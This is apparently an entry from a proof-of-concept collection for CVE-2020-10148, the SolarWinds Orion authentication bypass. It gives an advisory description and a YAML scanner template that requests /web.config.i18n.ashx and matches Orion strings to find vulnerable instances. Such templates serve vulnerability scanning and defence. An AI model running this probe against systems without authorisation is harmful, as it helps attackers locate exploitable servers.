The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.
PoC代码[已公开]
id: CVE-2020-10148
info:
name: SolarWinds Orion Platform Authentication Bypass
author: su
severity: critical
description: |-
The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.
reference:
- https://www.tenable.com/security/research/tra-2020-41
- https://nvd.nist.gov/vuln/detail/CVE-2020-10148
tags: cve,cve2020,solarwinds,orion,auth-bypass
created: 2023/08/17
set:
r1: randomInt(800000000, 1000000000)
rules:
r0:
request:
method: GET
path: /web.config.i18n.ashx?l=en-US&v={{r1}}
expression: response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl"))
expression: r0()